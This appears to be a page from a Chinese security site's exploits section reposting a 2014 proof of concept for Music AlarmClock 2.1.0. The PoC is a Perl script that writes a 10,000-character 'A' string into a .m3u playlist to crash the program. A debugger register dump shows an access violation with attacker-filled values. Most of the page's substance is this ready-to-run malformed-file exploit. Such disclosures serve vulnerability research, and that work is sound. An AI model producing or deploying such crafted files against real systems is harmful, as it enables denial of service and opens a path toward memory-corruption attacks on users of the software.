首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Music AlarmClock 2.1.0 - (.m3u) Crash PoC
来源:vfocus.net 作者:Seljan 发布时间:2014-02-28  
#------------------------------------------------------------------------------------#
# Exploit Title: Music AlarmClock 2.1.0 (.m3u) Crash PoC                             #
# Date: Feb 25 2014                                                                  #
# Exploit Author: Gabor Seljan                                                       #
# Software Link: http://download.cnet.com/Music-AlarmClock/3000-2350_4-10419263.html #
# Version: 2.1.0                                                                     #
# Tested on: Windows XP SP3                                                          #
#------------------------------------------------------------------------------------#

# (a10.9e8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000000 ecx=7ffdd000 edx=41414161 esi=00153700 edi=0012df10
# eip=7c90100b esp=0012d5c8 ebp=0012d5d0 iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202

#!/usr/bin/perl

use strict;
use warnings;

my $filename = "poc.m3u";

my $junk = "A" x 10000;

open(FILE, ">$filename") || die "[-]Error:\n$!\n";
print FILE $junk;
close(FILE);

print "Exploit file created successfully [$filename]!\n";
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GoldMP4Player 3.3 - Buffer Ove
·VCDGEAR 3.50 Stack Buffer Over
·GoldMP4Player Buffer Overflow
·Total Video Player 1.3.1 (Sett
·GoAhead Web Server 3.1.x - Den
·GE Proficy CIMPLICITY gefebt.e
·Symantec Endpoint Protection M
·Kloxo Remote Root Exploit
·Python socket.recvfrom_into()
·Embedthis Goahead 3.1.3-0 Deni
·VCDGear 3.50 (.cue) - Stack Bu
·Python socket.recvfrom_into()
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved